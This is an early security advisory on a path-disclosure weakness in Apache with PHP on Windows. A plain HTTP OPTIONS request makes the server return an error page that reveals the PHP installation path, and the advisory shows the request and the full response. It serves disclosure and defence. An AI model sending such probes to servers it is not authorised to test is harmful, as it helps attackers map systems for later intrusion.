PHP Advisory #2

["Paul Brereton" <brereton_paul () btopenworld com>]

Title : PHP Reveals True Path (OPTIONS)
Author : Paul Brereton
E-Mail : brereton_paul () btopenworld com

Summary : When a web administrator installs Apache with PHP and adds
index.php to the Apache configuration file, Apache first looks for index.php
when sending back the default web page for this directory. This opens up a
security weakness that allows remote attackers to gain sensitive information
about the directory structure of the Apache and PHP installation.

Details :Sending an OPTIONS request to the web server reveals the
installation path of PHP.

Example:
The OPTIONS output is show here:

> OPTIONS / HTTP/1.1
> Host: 192.168.1.2
> Accept: */*

< HTTP/1.1 500 Internal Server Error
< Date: Sun, 03 Feb 2002 10:56:53 GMT
< Server: Apache/2.0.28 (Win32)
< Vary: accept-language
< Accept-Ranges: bytes
< Content-Length: 680
< Connection: close
< Content-Type: text/html; charset=ISO-8859-1

< <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< <HTML>
< <HEAD>
< <TITLE>Server error!</TITLE>
< <LINK REV="made" HREF="mailto:admin@192.168.1.2";>
< </HEAD>
<
< <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC">
< <H1>Server error!</H1>
< <DL>
< <DD>
<
<
<
< handler "cgi-script" not found for: C:/php/php.exe
<
<
< </DL><DL><DD>
<If you think this is a server error, please contact
<the <A HREF="mailto:admin@192.168.1.2";>Webmaster</A>
<
< </DL>
<
< <H2>Error 500</H2>
< <DL>
< <DD>
< <ADDRESS>
< <A HREF="/">192.168.1.2</A>
< <BR>
<
< <small>02/03/02 10:56:53</small>
< <BR>
< <small>Apache/2.0.28 (Win32)</small>
< </ADDRESS>
< </DL>
< </BODY>
< </HTML>
<

As you can see the line " handler "cgi-script" not found for: C:/php/php.exe
" reveals the install path of PHP.